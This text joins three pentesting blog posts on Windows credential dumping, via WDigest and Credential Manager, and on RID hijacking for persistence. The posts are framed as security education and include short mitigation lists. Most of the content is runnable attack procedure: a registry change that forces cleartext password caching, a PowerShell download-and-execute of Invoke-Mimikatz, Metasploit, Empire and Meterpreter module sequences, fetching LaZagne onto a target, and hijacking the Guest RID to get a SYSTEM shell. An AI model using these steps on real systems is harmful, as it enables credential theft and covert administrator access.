Credential Dumping: Wdigest

This is our third article in the series of Credential Dumping. In this article, we will manipulate WDigest.dll in or retrieve the system credentials. The methods used in this article are for both internal and external penetration testing.

Table of Content:

·         Introduction to WDigest

·         Working of WDigest.dll

·         Manual

·         PowerShell

·         Powershell via meterpreter

·         Metasploit Framework

·         PowerShell Empire

·         Mitigation

·         TL; DR

Introduction to Wdigest

WDigest.dll was launched through Windows XP was specifically crafted for HTTP and SASL authentication. Basically, it’s work was to send confirmation of secret keys in order to authenticate the said protocol. The security attributes of NTLM protocol were applied to this DLL file as it’s a challenge/response protocol too. WDigest protocol is enabled in Windows XP — Windows 8.0 and Windows Server 2003 — Windows Server 2012 by default, which allows credentials to be saved in clear text in LSAS file. Windows 10, Windows Server 2012 R2 and Windows Server 2016 doesn’t have this protocol active. And it also released a patch for earlier versions.

Working of WDigest.dll

As it is a challenge response protocol, it important to understand how it works. Such protocols demands a validating server that creates a challenge for them. The said challenge has incalculable data. A is key is obtained from user’s password which is further used to encrypt the challenge and to craft response. A reliable service can then validate the user processes by comparing to the encrypted response that is received by the client and if the responses match, then the user is authenticated.

Now that we have understood what exactly a WDigest protocol is and how it works, let’s get to practical of how to exploit it.

Manual

Our first method to exploit WDigest in to dump the desired credentials is manual. Such a method comes handy in white box pentesting. In this method, download mimikatz and run the following commands :

privilege::debug

sekrusla::wdigest

As you can then see that the result of above commands didn’t bear fruit because WDigest protocol wasn’t active. To activate the said protocol, use the following command:

reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1

The above command will create a file called UseLogonCredetnial in the WDigest folder in registry and simultaneously sets it binary value to 1 as you can in the image below:

The above step has just enabled WDigest in the system. Which will allow the password to be saved in memory that too in clear texts. And now these passwords can be retrieved sneakily as you will see further in this article.

For now, we need to update the policy that we just entered in the registry using the following command:

gpupdate /force

Now, if you launch mimikatz and run the following commands then you will have the credentials.

privilege::debug

sekurlsa::wdigest

PowerShell

In this method, we will be invoking PowerShell scripts in the system. This script will further help us get our hands on the credentials. Simply launch the PowerShell Command Prompt and run the following commands:

Import-Module .\WdigestDowngrade.ps1

Invoke-WdigestDowngrade

reg query HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential

Once the above commands are executed successfully, run the following command to dump the credentials.

IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds

And as you can see, we got the credentials.

PowerShell via meterpreter

In this method, we will be invoking PowerShell script in our meterpreter session. This script will further help us get our hands on the credentials. When you have a meterpreter session, run the following commands to create the UseLogonCredential file and makes changes in the registry key.

reg enumkey -k HKLM\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest

load powershell

powershell_import /root/Desktop/Invoke-WdigestDowngrade.ps1

powershell_execute Invoke-WdigestDowngrade

After the above commands create the UseLogonCredential file as required and then you can launch mimikatz to dump the credentials using following commands:

load powershell

powershell_import /root/Invoke-Mimikatz.ps1

powershell_execute Invoke-Mimikatz -CredsDump

Metasploit Framework

Our next method is an excellent method to dump the credentials remotely which often a requirement in gray box pentesting. One you have your meterpreter session via Metasploit, remember to background the session and then you can execute wdigest_caching exploit to make the changes in WDigest folder which we just did manually in our previous method by using the following commands:

use post/windows/manage/wdigest_caching

set session 1

execute

Then further use the load kiwi module to dump the credentials. For doing so, type :

load kiwi

creds_wdigest

And yes! We our credentials.

PowerShell Empire

When you have a session through Empire, use the post exploit wdigest_downgrade to create the UseLogonCredential file in wdigest folder and its registry key value i.e. 1 with the help of following commands:

usemodule management/wdigest_downgrade*

execute

Once the above post exploit is executed successfully, you can use another build in post exploit to dump the credentials with the following set of commands:

usemodule credentials/mimikatz/logonpasswords*

execute

And after the execution of the above command, you have the credentials.

Mitigation

Following are the steps one can take in order to secure themselves from this scenario:

·         Make sure the there is no UseLogonCredential file in your system

·         If you are using the older versions of windows then make sure that windows us updates with the patch

·         UseLogonCredential registry keys values should be set to 0 to completely disable this protocol.

·         Regularly check the registry key value to make sure that you have not been the victim.

TL; DR

Understanding the very basics of your operating systems such as windows, allow you to be more secure in this cyber world. Knowing how endpoints are put together to work perfectly for your convenience is important as a seemingly minor change can make you vulnerable. Such as WDigest saves all the passwords in memory on clear text which puts the credentials of the user at risk. And this thought made us take a stab on credential dumping by manipulating WDigest. So, through with mimikatz, Metasploit framework and other such tools that we have mentioned above can leverage your credentials both locally and remotely and can even allow attacker to use them to their advantage. An attacker who is able to get administrator privileges of your system can modify the values in registry and dump the crendentials as shown the article above using Mimikatz, Metasploit, empire, and PowerShell scripts.

Credential Dumping: Credential Manager

In this article we learn about dumping system credentials by exploiting credential manager. We will talk about various methods today which can be used in both internal and external penetration testing.

Table of content:

·         Introduction to credentials manager

·         Accessing credential manager

·         Metasploit

·         Empire

·         Credentialfileview

·         PowerShell

·         Mitigation

·         Conclusion

Introduction to Credential Manager

Credential Manager was introduced with windows 7. It is like digital vault to keep all of your credentials safe. All of the credentials are stored in a credentials folder which you will find at this location - %Systemdrive%\Users\\AppData\Local\Microsoft\Credentials and it is this folder that credential manager accesses. it also allows you to add, edit, delete, backup and even restore the passwords.

Credentials saved in credential manager are of two types:

·         Web credentials: As Edge and widows are product of same company, credentials manager has access to the stored information of Edge browser too, in order to increase safe keeping of saved credentials. It also stores the password of order application provided by Microsoft such as skype, Microsoft office, etc.

·         Windows credentials: Under this category, all the windows login credentials can be found. Along with the any system that is connected in the network.

Applications which are run by windows and has your credentials saved will automatically be saved in credential manager. Even when you update them, change is noted by and updated in credential manager too.

Accessing Credential Manager

To access credential manager, you can simply search it up in the start menu or you can access it bu two of the following methods:

·         You can open control panel > user accounts > credential manager

·         You can also access it through command line with the command vaultcmd and its parameters.

When you connect to another system in the network as using any method like in the following image:

And while connecting when you provide the password and store it for later use too then these credentials are saved in credential manager.

Irrespective of website and its security, when you save any password in edge or any other application such as skype or outlook, it’s password too gets saved in credential manager. For instance we have stored gmail’s password in our practical as shown in the image below:

You can confirm from the following image that the password is indeed saved.

And now, when you access credential manager, using any method, you will find that in windows credentials tab all the system, network passwords are stored.

And under the web credentials tab there are will be application’s passwords and the passwords saved in edge will be saved.

Metasploit

Now all these credentials can be dumped with simple methods. Once you have a session through Metasploit, all you have to do is upload mimikatz and run it. Mimikatz is an amazing credential dumping tool. We have covered mimikatz in detail in one our previous articles, to read that article click here.

And to run mimikatz remotely through Metasploit session, use the following command:

upload /root/Desktop/mmikatz.exe

shell

cd

mimikatz.exe

And once the mimikats is executed successfully, you will get credentials from cred manager as shown in the image above.

Empire

Similarly, while using empire, you can dump the credentials by downloading Lazagne.exe directly in the target system and then manipulatinthe lagazne.exe file to get all the credentials. LaZange is on eof the best credential dumping tool. We have covered LaZagne in detail in one our previous articles, to read that article click here.

Use the following commands to dump the credentials with this method :

shell wget https://github.com/AlessandrZ/LaZagne/releases/download2.4.3/lazagne.exe -outfile lazagne.exe

shell wget

shell dir

shell ./lazagne.exe all

After the execution of commands, you can see that the passwords have been retrieved as shown in the following image:

Credential file view

Our next method is using third-party tool, i.e. credentialfileview. This tool is very effective when it comes to internal penetration testing. To use this tool, simply download it and launch it. After launching itself, it will ask you for the windows password.

Once you provide the password, it will give you all the credentials you need as shown in the image below:

Windows PowerShell

This method of password dumping can prove itself useful in both internal and external pentesting. In this method you have to run a script in windows powershell. You will find the script here. And once you run the script you will have all the web credentials as shown in the image below:

You can also use powershell remotely to dump credentials with help of Metasploit. It is very simple as you just have to run combination of following commands after you have your session:

load powershell

powershell_import /root/Get-WebCredentials.ps1

powershell_execute Get-WebCredentials

And just like that with the help of powershell commands, you will have the desired credentials.

Mitigation

Following are the measures you can use to keep your passwords safe:

·         DO NOT save passwords in your system, browser or any other application

·         Use different passwords for every account

·         If you have trouble remembering passwords then instead of keeping them in clear text in your system, use an online password manager to keep them safe.

·         Use the latest version of the operating system and applications.

·         Manually go to the login page instead of following a link.

·         Keep firewall/defender enabled

·         Keep you employees/employers aware

Conclusion  

As you have noticed from our article the even though this feature of credential manager that is provided by windows is convenient, it is not secure and once the attacker has the access of your system then these credentials are waiting to be theirs as there is no security layer added to credential manager. It is important to be aware of every feature your operating system is providing just so you can save yourself. Hence, it is important to know how to access credential manager and how to operate it and how it can be exploited.

We live in a cyber active world and there are login credentials for everything, one can’t remember every credential ever. Though credential manager is utility makes it easy for us and takes the responsibility of saving the passwords; but at what expense?

We at Hacking Articles want to request everyone to stay at home and self-quarantine yourself for the prevention against the spread of the Covid-19. Take Care and be Healthy and Keep Hacking!

Persistence: RID Hijacking

In this post, we will be discussed on RID hijacking which is considered as persistence technique in term of cyber kill chain and in this article, you will learn multiple ways to perform RID hijacking.

Table of Content

Introduction

·         FSMO roles

·         SID & RID

·         Syntax

·         Important Key points

RID-Hijacking

·         Metasploit

·         Empire

Introduction

Microsoft divided the responsibilities of a DC into FSMO roles that together make a full AD system, FSMO (Flexible Single Master Operation) has 5 reponsibilties for forest and domain.

·         Schema Master (one per forest)

·         Domain Naming Master (one per forest)

·         Relative identifier (RID) Master (one per domain)

·         Primary Domain Controller (PDC) Emulator (one per domain)

·         Infrastructure Master (one per domain)

SID & RID

The RID is a Relative Identifier which is the last part of SID (security identifier) and should be unique for a particular object within a domain. Each security principal has a unique SID that is issued by a security agent. The agent can be a Windows local system or domain. The agent generates the SID when the security principal is created. The SID can be represented as a character string or as a structure.

Syntax

Syntax: S-[Revision]-[IdentifierAuthority]-[SubAuthority0]-[SubAuthority1]-...-[SubAuthority[SubAuthorityCount]](-RID)

Eg: S-1-5-21-1543651058-3042185658-368006193-1001

Important Key points

·         The revision is always 1 for current NT versions.

·         When a new issuing authority is established under Windows (for example, a new computer is deployed or a domain is established), a SID with an arbitrary value of 5 is allocated as an identifier authority.

·         A constant value of 21 is used as a particular value for the root of this group of sub-authorities, and a 96-bit random number is generated and parceled out to the three sub-authorities with each sub-authority having a 32-bit chunk.

·         If the new issuing authority under which this SID was developed is a domain, this SID is referred to as the "SID domain."

·         Windows allocates RIDs starting at 1,000; RIDs that have a value of less than 1,000 are considered reserved and are used for special accounts.

·         For example, all Windows accounts with a RID of 500 are considered built-in administrator accounts in their respective issuing authorities.

RID Hijacking

'RID Hijacking' is a tactic for an adversary to persist inside victim’s system by hijacking the RID the Administrator account for the Guest account, or another local account. Creating persistence in victim’s system allows an adversary to establish a foothold, continuously regaining access that will unseen to you and allow to hijacker to logon as an authorized account which adversary has hijacked.

Thus, for this you need to have privilege account session as we have in the below image to establish a persistence access.

Rid-Hijacking: Metasploit

So, as you know, we had meterperter session with admin privilege and Metasploit provides a module to create a persistence in victim’s machine by hijacking RID of administrator user.

 This module will create an entry on the target by modifying some properties of an existing account. It will change the account attributes by setting a Relative Identifier (RID), which should be owned by one existing account on the destination machine. Taking advantage of some Windows Local Users Management integrity issues, this module will allow to authenticate with one known account credentials (like GUEST account), and access with the privileges of another existing account (like ADMINISTRATOR account), even if the spoofed account is disabled.

use post/windows/manage/rid_hijack

set getsystem true

set guest_account true

set session 2

set password 123

exploit

once you will run the exploit, will check state for guest account and if found disable then first it will activate the account and then overwrite RID value from 501 to 500 i.e RID of administrator account.

As you have seen in the above step, the RID of guest is 500 and password is 123 thus we logged as guest we should get administrator privilege CMD of the target machine. Here we are going to use impacket tool to get the CMD shell of the remote machine.

cd /impacket/example

./psexec.py Guest:123@ 192.168.1.107

As you can observe that we have obtain CMD Shell as “nt authority /system” i.e CMD as administrator account.

Rid-Hijacking: Empire

RID hijacking is also possible using empire but this module in not available in Empire project you need to clone it module from github.

git clone https://github.com/EmpireProject/Empire.git

git clone https://github.com/r4wd3r/RID-Hijacking.git

once both programs get downloaded fetch the Invoke-RIDHijacking.ps1 file from inside /RID-Hijacking/modules/empire/data/module_source/persistence into /root/Empire/data/module_source/persistence.

cd RID-Hijacking/modules/empire/data/module_source/persistence

cp Invoke-RIDHijacking.ps1 /root/Empire/data/module_source/persistence

Also copy the rid_hijack.py from /RID-Hijacking/modules/empire/lib/modules/powershell/persistence/elevated into /root/Empire/lib/modules/powershell/persistence/elevated

cd RID-Hijacking/modules/empire/lib/modules/powershell/persistence/elevated

cp rid_hijack.py /root/Empire/lib/modules/powershell/persistence/elevated

Once you are done with configuration then launch the module to start the attack, this will initialise the just like Metasploit. First identify the state of guest account and then hijack RID 500 for guest user.

usemodule persistence/elevated/rid_hijack*

set UserGuest True

set Password 123

set Enable True

execute  

Again repeat the above step to connect CMD of victim’s machine assure that you should have a privilege shell.

 

https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-azod/ecc7dfba-77e1-4e03-ab99-114b349c7164